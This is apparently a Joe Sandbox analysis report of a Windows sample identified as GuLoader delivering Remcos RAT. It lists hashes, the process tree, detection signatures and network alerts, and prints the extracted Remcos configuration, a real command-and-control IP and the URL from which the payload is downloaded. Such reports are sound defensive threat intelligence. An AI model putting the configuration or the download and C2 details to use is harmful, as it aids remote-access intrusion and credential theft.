Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nutzen_Unterschrift_Planen#2024.com.exe

Overview

General Information

Sample name:Nutzen_Unterschrift_Planen#2024.com.exe
Analysis ID:1520510
MD5:50ad24c74502951d0bec1507ca050c46
SHA1:392235b1cf28c1e5e5c4ce98922b472d80fb8d0c
SHA256:e4ed3892cc2c77e7de57a5fc47040118740b1a672747f72193ed065570a55b38
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe" MD5: 50AD24C74502951D0BEC1507CA050C46)
    • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe" MD5: 50AD24C74502951D0BEC1507CA050C46)
      • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 7560 cmdline: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao" MD5: 50AD24C74502951D0BEC1507CA050C46)
      • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 3620 cmdline: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw" MD5: 50AD24C74502951D0BEC1507CA050C46)
      • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 712 cmdline: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo" MD5: 50AD24C74502951D0BEC1507CA050C46)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "66.150.198.142:2700:166.150.198.142:27000:166.150.198.142:26000:166.150.198.142:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I617OK", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.316846928075.0000000007E80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512JoeSecurity_RemcosYara detected Remcos RATJoe Security

          Sigma Signatures

          Stealing of Sensitive Information

          barindex
          Sigma detected: Remcos
          Source: Registry Key setAuthor: Joe Security: Data: Details: C0 29 BD 1E 13 EA 18 AF CD FE E6 96 26 54 8F F5 B0 8C 1F 32 A6 6C D5 9E 43 FC BD 1F FC 4B 9F 7A 82 14 23 CE FC 0A 72 1D 15 85 86 E2 6C 3A 1C 38 18 A5 82 70 14 73 8C 7A 99 74 E2 6D BB 98 89 77 D9 76 97 60 60 A9 F7 F8 C5 8C 6C F2 43 6A AC 06 36 2D 86 C1 5B D6 A2 32 7F 2D EF 1A 2B A3 1F E3 7D A3 FA 41 E0 36 63 D7 4D CE 7A 18 1F 3E EA 79 E8 A6 4C 48 B2 6A 99 06 08 5B CC D5 5C FA 42 EB , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe, ProcessId: 6512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-I617OK\exepath

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T12:58:45.334039+020020365941Malware Command and Control Activity Detected192.168.11.204978466.150.198.1422700TCP
          2024-09-27T12:58:46.349101+020020365941Malware Command and Control Activity Detected192.168.11.204978666.150.198.1422700TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T12:58:46.395551+020028033043Unknown Traffic192.168.11.2049785178.237.33.5080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T12:58:43.810496+020028032702Potentially Bad Traffic192.168.11.204978366.150.198.14280TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "66.150.198.142:2700:166.150.198.142:27000:166.150.198.142:26000:166.150.198.142:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I617OK", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Multi AV Scanner detection for submitted file
          Source: Nutzen_Unterschrift_Planen#2024.com.exeReversingLabs: Detection: 26%
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR
          Machine Learning detection for sample
          Source: Nutzen_Unterschrift_Planen#2024.com.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,3_2_00404423
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_36F710F1
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F76580 FindFirstFileExA,2_2_36F76580
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49784 -> 66.150.198.142:2700
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49786 -> 66.150.198.142:2700
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: 66.150.198.142
          Source: global trafficTCP traffic: 192.168.11.20:49784 -> 66.150.198.142:2700
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: INTERNAP-BLOCK-4US INTERNAP-BLOCK-4US
          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49785 -> 178.237.33.50:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49783 -> 66.150.198.142:80
          Source: global trafficHTTP traffic detected: GET /lOqpXUmQJccVjyn149.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 66.150.198.142Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: global trafficHTTP traffic detected: GET /lOqpXUmQJccVjyn149.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 66.150.198.142Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321701674834.0000000007EA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://66.150.198.142/lOqpXUmQJccVjyn149.bin
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000000.316597134782.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.ebuddy.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.imvu.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.nirsoft.net/
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: https://www.google.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0041183A OpenClipboard,GetLastError,DeleteFileW,3_2_0041183A
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_0040987A
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_004098E2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_00406DFC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00406E9F
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004068B5
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004072B5

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess Stats: CPU usage > 6%
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00401806 NtdllDefWindowProc_W,3_2_00401806
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004018C0 NtdllDefWindowProc_W,3_2_004018C0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004016FD NtdllDefWindowProc_A,4_2_004016FD
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004017B7 NtdllDefWindowProc_A,4_2_004017B7
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00402CAC NtdllDefWindowProc_A,5_2_00402CAC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00402D66 NtdllDefWindowProc_A,5_2_00402D66
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F7B5C12_2_36F7B5C1
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F871942_2_36F87194
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00406E8F3_2_00406E8F
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044B0403_2_0044B040
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0043610D3_2_0043610D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004473103_2_00447310
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044A4903_2_0044A490
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040755A3_2_0040755A
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0043C5603_2_0043C560
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044B6103_2_0044B610
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044D6C03_2_0044D6C0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004476F03_2_004476F0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044B8703_2_0044B870
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044081D3_2_0044081D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004149573_2_00414957
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004079EE3_2_004079EE
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00407AEB3_2_00407AEB
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044AA803_2_0044AA80
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00412AA93_2_00412AA9
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00404B743_2_00404B74
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00404B033_2_00404B03
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044BBD83_2_0044BBD8
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00404BE53_2_00404BE5
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00404C763_2_00404C76
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00415CFE3_2_00415CFE
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00416D723_2_00416D72
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00446D303_2_00446D30
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00446D8B3_2_00446D8B
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004050384_2_00405038
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0041208C4_2_0041208C
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004050A94_2_004050A9
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0040511A4_2_0040511A
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0043C13A4_2_0043C13A
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004051AB4_2_004051AB
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004493004_2_00449300
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0040D3224_2_0040D322
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0044A4F04_2_0044A4F0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0043A5AB4_2_0043A5AB
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004136314_2_00413631
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004466904_2_00446690
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0044A7304_2_0044A730
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004398D84_2_004398D8
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004498E04_2_004498E0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0044A8864_2_0044A886
